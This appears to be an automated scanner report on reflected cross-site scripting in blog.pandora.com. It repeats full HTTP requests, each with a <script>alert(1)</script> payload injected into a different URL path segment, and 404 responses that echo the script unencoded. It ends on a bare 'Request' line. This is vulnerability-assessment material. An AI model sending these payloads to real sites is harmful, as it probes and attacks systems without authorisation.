HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:51 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008df6e5<script>alert(1)</script>6172eb86b30/05/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 150c1<script>alert(1)</script>9c01c9b532d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/05150c1<script>alert(1)</script>9c01c9b532d/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:54 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/05150c1<script>alert(1)</script>9c01c9b532d/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 15eb9<script>alert(1)</script>7a020e9b0eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora15eb9<script>alert(1)</script>7a020e9b0eb/archives/2008/06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:02 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora15eb9<script>alert(1)</script>7a020e9b0eb/archives/2008/06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ec3a9<script>alert(1)</script>a9054eec92c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesec3a9<script>alert(1)</script>a9054eec92c/2008/06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:07 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesec3a9<script>alert(1)</script>a9054eec92c/2008/06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 46068<script>alert(1)</script>eee473a0b7a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200846068<script>alert(1)</script>eee473a0b7a/06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:10 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200846068<script>alert(1)</script>eee473a0b7a/06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c3962<script>alert(1)</script>2bd69b3ec0b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/06c3962<script>alert(1)</script>2bd69b3ec0b/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:14 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/06c3962<script>alert(1)</script>2bd69b3ec0b/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47138<script>alert(1)</script>a3f13374191 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora47138<script>alert(1)</script>a3f13374191/archives/2008/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:50 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora47138<script>alert(1)</script>a3f13374191/archives/2008/07/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e4152<script>alert(1)</script>d0196897ba0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivese4152<script>alert(1)</script>d0196897ba0/2008/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:55 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivese4152<script>alert(1)</script>d0196897ba0/2008/07/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 12ccb<script>alert(1)</script>30223f2cf54 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200812ccb<script>alert(1)</script>30223f2cf54/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:58 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200812ccb<script>alert(1)</script>30223f2cf54/07/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a9e3c<script>alert(1)</script>20dad2bc554 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/07a9e3c<script>alert(1)</script>20dad2bc554/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:04 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/07a9e3c<script>alert(1)</script>20dad2bc554/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 56d79<script>alert(1)</script>a4032462556 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora56d79<script>alert(1)</script>a4032462556/archives/2008/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:43 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora56d79<script>alert(1)</script>a4032462556/archives/2008/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 25bf5<script>alert(1)</script>3d971d76d88 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives25bf5<script>alert(1)</script>3d971d76d88/2008/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:45 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives25bf5<script>alert(1)</script>3d971d76d88/2008/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5abe6<script>alert(1)</script>db42742e74 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20085abe6<script>alert(1)</script>db42742e74/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:47 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 348 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20085abe6<script>alert(1)</script>db42742e74/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 70934<script>alert(1)</script>e46d04bff1b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/0870934<script>alert(1)</script>e46d04bff1b/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:51 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/0870934<script>alert(1)</script>e46d04bff1b/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ac95c<script>alert(1)</script>f39701078da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraac95c<script>alert(1)</script>f39701078da/archives/2008/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:56 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraac95c<script>alert(1)</script>f39701078da/archives/2008/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eb2c5<script>alert(1)</script>2ae1ae68fdb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archiveseb2c5<script>alert(1)</script>2ae1ae68fdb/2008/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:58 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archiveseb2c5<script>alert(1)</script>2ae1ae68fdb/2008/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e57ea<script>alert(1)</script>aa701cd74e3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008e57ea<script>alert(1)</script>aa701cd74e3/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:01 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008e57ea<script>alert(1)</script>aa701cd74e3/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 500d6<script>alert(1)</script>b55ef145dcc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/09500d6<script>alert(1)</script>b55ef145dcc/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:04 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/09500d6<script>alert(1)</script>b55ef145dcc/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 872c8<script>alert(1)</script>e32ca06f3d3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora872c8<script>alert(1)</script>e32ca06f3d3/archives/2008/10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:48 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora872c8<script>alert(1)</script>e32ca06f3d3/archives/2008/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 69a72<script>alert(1)</script>b4e2002f078 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives69a72<script>alert(1)</script>b4e2002f078/2008/10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:53 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives69a72<script>alert(1)</script>b4e2002f078/2008/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c1a34<script>alert(1)</script>3e603248071 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
